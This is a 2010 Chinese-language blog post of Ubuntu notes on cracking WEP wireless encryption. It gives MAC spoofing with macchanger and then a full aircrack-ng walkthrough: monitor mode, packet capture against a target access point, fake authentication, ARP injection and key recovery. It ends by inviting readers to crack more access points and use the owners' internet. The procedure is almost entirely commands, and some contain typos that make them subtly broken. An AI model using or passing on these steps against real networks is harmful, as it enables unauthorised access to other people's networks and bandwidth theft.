2010年8月9日星期一

Ubuntu 9.10學習筆記-破解無線WEP

如果不想被盜網就使用WPA2或者限制mac位址吧。
要是想要偽裝mac 位址,可以使用偽造自己的mac位址(這一步你也可以不要)

1.首先我們查看自己的mac地址
在終端中輸入ifconfig -a 察看當前網卡,這裏是看你機器上的所有網卡,你要自己找到你的無線網卡
在這一步我看到的網卡名稱為

wlan0
然後先停止載入USB網卡驅動
敲入命令
ifconfig -a wlan0 down

2. 然後輸入macchanger –m 00:11:22:33:44:55 wlan0
將自己的USB網卡mac位址修改
-m後跟要偽造的MAC,之後再跟要修改的網卡名稱,上面這裏我們把USB網卡MAC修改成00:11:22:33:44:55
重新載入USB網卡驅動
敲入命令
ifconfig -a wlan0 up
下面是原內容,自己看看照著來好了。


———————————————————————
Ubuntu 9.10破解wep無線加密
一、安裝Ubuntu和aircrack-ng
先安裝 Ubuntu9.04,更新系統到最新
終端中輸入 sudo apt-get install aircrack-ng 安裝aircrack-ng
沒聯網的話 到別的電腦上網下載aircrack-ng Ubuntu DEB安裝包 安裝
下載地址:http://packages.ubuntu.com/zh-cn/jaunty/i386/aircrack-ng/download
二、破解過程

1、啟動無線網卡的監控模式,在終端中輸入:sudo airmon-ng start wlan0
wlan0是無線網卡的埠,可在終端中輸入 ifconfig 查看)

2、查看無線AP在終端中輸入:
sudo airodump-ng mon0
(特別說明:啟動監控模式後無線網的埠現在是 mon0 !!!)
看看有哪些採用wep加密的AP線上,然後按 ctrl+c 退出,保留終端

3、抓包
另開一個終端,輸入:
sudo airodump-ng -c 6 –bssid 目標的mac位址 -w wep mon0
(-c 後面跟著的6是要破解的AP工作頻道,–bissid後面跟著的AP’s MAC是要欲破解AP的MAC位址,-w後面跟著wep的是抓下來的資料包DATA保存的檔案名,具體情況根據步驟2裏面的線上AP更改頻道和MAC地 址,DATA保存的檔案名可隨便命名)

4、與AP建立虛擬連接
再另開一個終端,輸入:
sudo aireplay-ng -1 0 -a AP’s MAC -h My MAC mon0
-h後面跟著的My MAC是自己的無線網卡的MAC位址,命令:
iwlist wlan0 scanning
可查看自己的MAC地址)

5、進行注入
成功建立虛擬連接後輸入:
sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b 目標的MAC位址 -h 我的MAC位址 mon0
現在回頭看下步驟3的終端是不是DATA在開始飛漲!

6、解密
收集有5000個以上的DATA之後,另開一個終端,輸入:
sudo aircrack-ng wep*.cap
進行解密
(如果沒算出來的話,繼續等,aircrack-ng 會在DATA每增加多5000個之後就自動再運行,直到算出密碼為至)

7、收工
破解出密碼後在終端中輸入 sudo airomon-ng stop mon0 關閉監控模式,不然無線網卡會一直向剛剛的AP進行注入的,用ctrl+c退出或者直接關閉終端都是不行的。現在可以衝浪去了,或者重複步聚1-7破解其 它的AP 呵呵兄弟們衝浪時可別太猛了,不然把主人給沖翻了可就不好。

0 留言:

發佈留言

Related Posts with Thumbnails